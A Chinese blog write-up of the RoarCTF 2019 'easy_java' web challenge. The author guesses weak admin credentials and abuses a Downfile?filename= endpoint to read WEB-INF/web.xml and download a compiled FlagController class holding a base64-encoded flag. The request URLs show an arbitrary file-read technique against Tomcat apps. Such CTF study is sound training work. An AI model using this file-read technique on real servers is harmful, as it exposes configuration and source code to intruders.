RoarCTF2019web题-easy_java writeup

最新推荐文章于 2024-03-02 12:58:28 发布
最新推荐文章于 2024-03-02 12:58:28 发布
阅读量6.5k 收藏 9
点赞数 14
文章标签: RoarCTF2019 黑客大赛 网络安全 WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/silencediors/article/details/102579567
版权

RoarCTF2019web题-easy_java
作为团队最强的web选手(就我一个),这次的比赛也没时间打,把简单的题放一下,前面要说下,做web宁可把题目想简单,也不要想复杂,因为现在的web题出题人越来越厉害(gou)(怀念以前查看源码就得flag的时代),出题的把握可能也没那么好,思维多次引导的话就可能走岔路,就像这题我开始一直在想反序列化和upload流上传的事,甚至是tomcat那个版本的RCE。。。。。最后发现就是个包含。。。话不多说,上正题。
此题环境见https://buuoj.cn/challenges
首先是一个登录界面,如下图所示:
在这里插入图片描述
然后,猜了下账号密码,一次性猜对了admin/admin888,但是进去没什么卵用,如下图所示
在这里插入图片描述
然后啥也没有,只能看到个图片的真实路径,就没了,真的没了,然后出题人还各种恶意引导,真的够够的。看登录界面有个help,点进去看无法下载:
结构是hxxp://127.0.0.1/Downfile?filename=help.docx,回显如下
在这里插入图片描述
这种形式有经验的都会换下请求方式,结果就可以了,初步推测此处的利用包含漏洞找flag文件。
首先报错是tomcat,包含下tomcat的web,xml试试,结果真的可以
hxxp://127.0.0.1/Downfile?filename=WEB-INF/web.xml

<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0">
<welcome-file-list>
<welcome-file>Index</welcome-file>
</welcome-file-list>
<servlet>
<servlet-name>IndexController</servlet-name>
<servlet-class>com.wm.ctf.IndexController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>IndexController</servlet-name>
<url-pattern>/Index</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>LoginController</servlet-name>
<servlet-class>com.wm.ctf.LoginController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginController</servlet-name>
<url-pattern>/Login</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>DownloadController</servlet-name>
<servlet-class>com.wm.ctf.DownloadController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadController</servlet-name>
<url-pattern>/Download</url-pattern>
</servlet-mapping>
<servlet>
<servlet-name>FlagController</servlet-name>
<servlet-class>com.wm.ctf.FlagController</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>FlagController</servlet-name>
<url-pattern>/Flag</url-pattern>
</servlet-mapping>
</web-app>

注意观察有个FlagController处理/Flag,请求/Flag试试:
在这里插入图片描述
注意抛错路径,然后我们结合tomcat的项目存放路径经验试试下载FlagController.class试试
果然是有的
在这里插入图片描述
发现类似base64编码的东西,解码果然是flag
在这里插入图片描述
在这里插入图片描述
总结下吧,这题叫easy_java,的确是一道很简单的web题,但是需要对java容器和项目存放位置比较了解,所以作为web选手,一定要对几大语言的容器,项目环境,有所了解,也说明出题人越来越**厉害(gou)**了。

silencediors
关注
  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
2019.4 DDCTF web--滴 writeup
04-14
DDCTF,2019年4月比赛,web,第一--滴 writeup,及flag。
[RoarCTF 2019]Easy Java详解wp
qq_62984336的博客
04-09 1795
[RoarCTF 2019]Easy Java详解
[SUCTF 2019]EasyWeb---无参数RCE
高高同学
08-19 604
SUCTF 2019]EasyWeb 考点: 无数字字母shell 利用.htaccess上传文件 绕过open_basedir 源码审计 <?php function get_the_flag(){ // web admin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); //命名格式(upload/tmp_md5(ip)
青少年CTF擂台挑战赛 2024 #Round 1 Web方向解 WP 全
Jay17的博客
03-02 1186
青少年CTF擂台挑战赛 2024 #Round 1 Web方向解 WP 全
Web安全--RCE代码执行
bobo_milk的博客
11-16 135
rce代码执行
[VNCTF] EasyJava
Landasika的博客
05-17 365
目录 [VNCTF] EasyJava一、拿到源码二、分析源码三、Servlet的线程安全:条件竞争四、构造反序列化 [VNCTF] EasyJava 一、拿到源码 首先拿到目,查看源码发现了提示:/file? 进入/file文件发现需要提交一个url。由于前面提示用file进入,这个时候我们可以尝试用文件读取。 输入 ?url=file:/// 之后显示发现有一个flag,但是...
Java代码审计之RCE(远程命令执行)
liguangyao213的博客
03-02 5789
Java代码审计系列课程(点我哦) 漏洞原理: RCE漏洞,可让攻击者直接向后台服务器远程注入操做系统命令或者代码,从而控制后台系统。 出现此类漏洞通常由于应用系统从设计上须要给用户提供指定的远程命令操做的接口。通常会给用户提供一个ping操做的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而若是设计者在完成该功能时,没有作严格的安全控制,则可能会致使攻击者经过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器 runti
EasyJava 一个java代码生成工具
weixin_45574655的博客
09-10 1817
经过半个月的时间,终于把我自己写的java代码生成工具,录制成了视频教程。视频地址 https://www.bilibili.com/video/BV1EN4y1c7sL/ 接下来我们简单介绍下生成的项目结构 这个表有 一个自增ID,一个唯一索引 code,还有一个 联合唯一索引,我们会根据这些关键的表信息生成相关的方法 我就不把所有类都列举出来了,重点看下mapper.xml 可以生成 基本的 分页查询、单条插入、单条插入或者更新、批量插入、批量插入或者更新、根据主键、唯一索引 单挑查询、修改、删除具体
CTFHub之RCE
遇事不决冲冲冲
04-17 1456
应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞 常用命令执行函数 system():  该函数会把执行结果输出。 passthru():  该函数只调用命令,并把运行结果原样地直接输出没有返回值 exec():  不输出结果,返回执行结果地最后一行 shell_exec():  不输出结果,返回执行结果 eval执行 源代码就在脸上 <?php if (isset($_REQUEST['cmd'])) { eva
WEB-buuctf-easy java
weixin_52804141的博客
01-01 231
WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非servlet class,他们不能包含在 .jar文件中 /WEB-INF/lib/:存放web应用需要的各种JAR文件,放置仅在这个应用中要求使用的jar文件,如数据库驱动jar文件 /WEB-INF/src/:源码目录,按照包名结构放置各个java文件。得到有一个文件,打开看一下,发现一串乱码,在仔细一看,里面又一串字符=结尾,疑似base64编码。所以构建paylod。
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常做的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们做某件事的程度。 在此项目中,您的目标是使用来自6位参与者的...
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问,恳请指正。 电子邮件:
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup
空指针-Base_on_windows_Writeup--最新版DZ3.4实战渗透1
08-03
2、我们获得了一份 config 文件,里面有最重要的 authkey 2、dz 有正常的备份数据,备份数据里有重要的 key 值 1、配合报错注入的攻击链 2
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8134
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
中转服务配置.zip
04-15
中转服务配置.zip
STC32智能车小主板
最新发布
04-15
根据逐飞官方的资料设计的STC32智能车主板,主要用于电磁循迹、光电循迹等等,接口丰富,电源资源分配充足,可很好的满足其他智能车的主板需求。
2024-2030全球及中国住宅配电盘行业研究及十五五规划分析报告.docx
04-15
2024-2030全球及中国住宅配电盘行业研究及十五五规划分析报告
c# winform编写的图片转ico应用程序
04-15
c# winform编写的图片转ico应用程序
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值